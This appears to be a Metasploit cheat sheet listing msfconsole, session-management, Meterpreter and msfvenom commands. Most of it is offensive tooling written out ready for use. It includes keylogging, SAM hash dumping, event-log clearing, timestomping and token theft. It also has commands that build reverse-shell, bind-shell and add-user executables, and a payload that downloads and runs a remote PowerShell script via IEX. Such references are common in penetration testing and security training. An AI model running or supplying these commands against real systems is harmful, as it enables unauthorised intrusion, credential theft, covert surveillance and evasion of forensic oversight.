msfconsole
# Start Metasploit
msfconsole
# Search for exploits or modules
search [library] [exploit] # Example: search auxiliary winrm
# Use a module
use [module_number]
# Show module options
options
# Set options
set [option] [value]
# Run the exploit
run / exploit
Sessions Management
# List active sessions
sessions
# Show help for session management
sessions -h
# Show verbose session details
sessions -v
# Interact with a session
sessions -i [id]
# Background the current session
background
# Name a session
sessions -n [name] -i [id]
# Kill a session
sessions -k [id]
# Kill all sessions
sessions -K
# Upgrade a session to Meterpreter
sessions -u [id]
Meterpreter
Core Commands
? # Help menu
background # Move session to background
exit # Terminate session
help # Help menu
migrate [PID] # Migrate process to a new PID
run [script] # Run a Meterpreter script
use [extension] # Load a Meterpreter extension
File System
cat [file] # Read and output file contents
cd [path] # Change directory
del [file] # Delete a file
download [file] # Download a file from target
edit [file] # Edit a file with vim
ls # List files in the directory
mkdir [dir] # Create a directory
pwd # Print current directory
rm [file] # Remove a file
upload [file] # Upload a file to the target
**Networking
ipconfig # Display network interfaces and IPs
portfwd # Forward ports on the victim
route # View or modify routing table
**System
clearav # Clear event logs
drop_token # Drop a stolen token
execute # Execute a command
getpid # Get current process ID
getprivs # Get as many privileges as possible
getuid # Get current user
kill [PID] # Kill a process
ps # List running processes
reg # Interact with registry
shell # Open a command shell
sysinfo # Show system information
**User Interface
enumdesktops # List accessible desktops
getdesktop # Get current desktop
idletime # Show system idle time
keyscan_start # Start keylogger
keyscan_dump # Dump keylogger data
keyscan_stop # Stop keylogger
screenshot # Take a screenshot
**Privilege Escalation
getsystem # Attempt privilege escalation
Password Dumping
hashdump # Dump password hashes from SAM
Timestomp
timestomp # Modify file timestamps
msfvenom
# Generate a basic payload
msfvenom -p [PAYLOAD] -e [ENCODER] -f [FORMAT] -i [ENCODE_COUNT] LHOST=[IP]
# List available payloads
msfvenom -l payloads
# List available encoders
msfvenom -l encoders
# Windows reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > reverse.exe
# Windows bind shell payload
msfvenom -p windows/meterpreter/bind_tcp RHOST=[IP] LPORT=[PORT] -f exe > bind.exe
# Windows add user payload
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
# Windows CMD shell payload
msfvenom -p windows/shell/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > prompt.exe
# Execute a remote script via PowerShell
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
# Encoded payload example
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe